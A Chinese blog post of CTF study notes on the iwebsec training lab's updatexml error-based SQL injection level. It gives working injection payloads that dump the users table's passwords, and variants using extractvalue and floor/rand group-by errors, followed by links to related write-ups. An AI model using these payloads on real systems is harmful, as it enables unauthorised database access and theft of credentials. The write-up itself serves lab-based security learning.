CTF学习笔记7:iwebsec-SQL注入漏洞-05-updatexml注入

已于 2022-01-23 21:57:28 修改
阅读量990 收藏
点赞数
分类专栏: CTF 文章标签: sql web安全 安全
于 2022-01-23 19:43:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lifeng_dc/article/details/122654660
版权

目录

一、解题过程

(一)直接上payload

?id=1^updatexml(1,concat(0x7e,(select group_concat(password) from iwebsec.users),0x7e),3)--+

说明:如果输出长度受限,需要用reverse反转再拼接

?id=1^updatexml(1,concat(0x7e,(select reverse(group_concat(password)) from iwebsec.users),0x7e),3)--+

在这里插入图片描述

二、后续分析

(一)报错注入探究

其他报错注入方式

1.rand和floor函数与group by的冲突

?id=-1 union select 1,count(*),3 from information_schema.tables group by concat(0x7e,database(),0x7e,floor(rand(0)*2))--+

在这里插入图片描述

2.extractvalue()函数

?id=-1^extractvalue(1,concat(0x7e,database(),0x7e))--+

在这里插入图片描述

lvx++
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入之floor报错注入以及各个部分详细分析 + iwebsec 实例分析 + updatexml() 报错 + extractvalue() 报错
m0_50917178的博客
12-09 4074
文章目录前言一、什么是floor报错注入二、利用iwebsec模拟实际注入过程三、updatexml()和extractvalue()报错注入四、问题 前言 本文为作者的学习笔记,主要介绍了floor注入原理,利用注入代码(payload)分析每个部分的作用以此来解释floor注入的原理。在解释过程中会使用phpstudy搭建的MySQL环境,并且利用iwebsec漏洞库来实践。最后顺带介绍updatexml和extractvalue报错注入。 提示:以下是本篇文章正文内容,下面案例可供参考 一、什么是
CTF Web学习(四)----SQL注入
网络猿的博客
01-11 1254
CTF Web学习(四) SQL注入 CTF Web学习目录链接 CTF Web学习(一):基础篇及头文件修改、隐藏 CTF Web学习(二):代码审计、burp suite应用 CTF Web学习(三):python脚本的编写及应用 文章目录CTF Web学习(四)前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。
小白的CTF之路Day3
glass_york的博客
12-28 100
新手,sqlilabs8,sqlilabs9,sqlilabs17,sqlilabs21
iwebsec靶场 SQL注入漏洞通关笔记5- updatexml注入(报错型盲注)
mooyuan的博客
11-27 1162
iwebsec靶场的SQL注入漏洞的第05updatexml注入漏洞渗透。​通过源码再来分析下时间盲注关卡重点内容:(1)闭合方式是什么?iwebsec的第05关关卡为数字型注入,无闭合方式(2)注入类别是什么?这部分是报错型盲注(3)是否过滤了关键字?很明显通过源码,iwebsec的时间报错型关卡无过滤任何信息了解了如上信息就可以针对性进行SQL渗透。初学者还是应该以手动注入方法练习,真正了解原理后可以在使用sqlmap来提升速度。
iwebsec靶场通关sql注入详解
最新发布
m0_51090949的博客
07-12 1063
iwebsec靶场,sql注入通关,详细教程。
iwebsec sql注入篇(详细过程,完结)
qq_60829702的博客
03-19 2230
iwebsec靶场,SQL注入篇,详细过程,全篇完结
iwebsec--sql注入漏洞
追求卓越,技术流~
11-20 1511
sql注入漏洞
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
cypherpunks-ctf:Cypherpunks CTF 智能合约漏洞攻击
05-14
Cypherpunks CTF Cypherpunks CTF是一款基于Web3 / 的战争游戏,灵感来自 ,该游戏将在以太坊虚拟机中进行播放。 每个级别都是一个需要被“破解”的智能合约。 欢迎等级PR! 在本地运行 安装所有软件包 ...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
java红酒网站源码-ctf-katana:ctf-武士刀
06-05
java网站源码CTF-武士刀 约翰哈蒙德 | 2018 年 2 月 1 日 在撰写本文时,此存储库将仅托管可能有助于解决 CTF 挑战的工具和命令列表。 我希望将其保留为“实时文档”,理想情况下它不会像我制作的旧“工具”页面 () ...
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
iwebsec靶场搭建
mooyuan的博客
11-25 4641
iwebsec靶场可以通过两种方法进行渗透。第二种是本地搭建:目前可以通过两种方法搭建,一种是虚拟机绿色版解压即用,另外一种则是通过docker安装。
iwebsec(代码执行)
果粒程
03-04 672
iwebsec(代码执行)
iwebsec 文件包含篇 (已完结)
qq_60829702的博客
03-30 1987
iwebsec 文件包含,详细分析,持续更新
Web安全:iwebsec || vulhub 靶场搭建.(各种漏洞环境集合,一键搭建漏洞测试靶场)
网络安全领域___专研者.
04-24 2819
iwebsec 本质上是一个漏洞集成容器,里面集成了大量的漏洞环境.(如:集合了SQL注入、文件包含、命令执行、XXE、反序列化、SSRF、XSS、文件上传等常见的web漏洞环境) Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身.
iwebsec靶场SQL注入-updatexml注入
qq_56041380的博客
03-27 296
updatexml注入也是一种报错注入,它利用updatexml函数中的第二个参数Xpath_string的报错进行注入。Xpath_string是XML文档路径,格式是/XXX/XXX/XXX/,如果格式不正确就会报错。
iwebsec靶场 SQL注入漏洞通关笔记4- sleep注入(时间型盲注)
mooyuan的博客
11-26 1678
iwebsec靶场的SQL注入漏洞的第04关sleep注入漏洞渗透,iwebsec靶场的时间型盲注由于没有任何过滤信息,与bool型盲注一样为数字型布尔盲注,故而使用sqlmap渗透十分方便高效。时间型盲注相对而言十分耗时,手注或者半自动化注入相对而言操作过程较为麻烦,初学者还是应该以手动与半自动化注入结合方法练习,真正了解原理后可以在使用sqlmap来提升速度。
iwebsec靶场 数据库漏洞通关1-MySQL数据库漏洞
mooyuan的博客
11-24 1066
iwebsec靶场的数据库漏洞第一项内容为MySQL漏洞渗透,如下所示我们可以使用kali的msf模块对其进行渗透。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值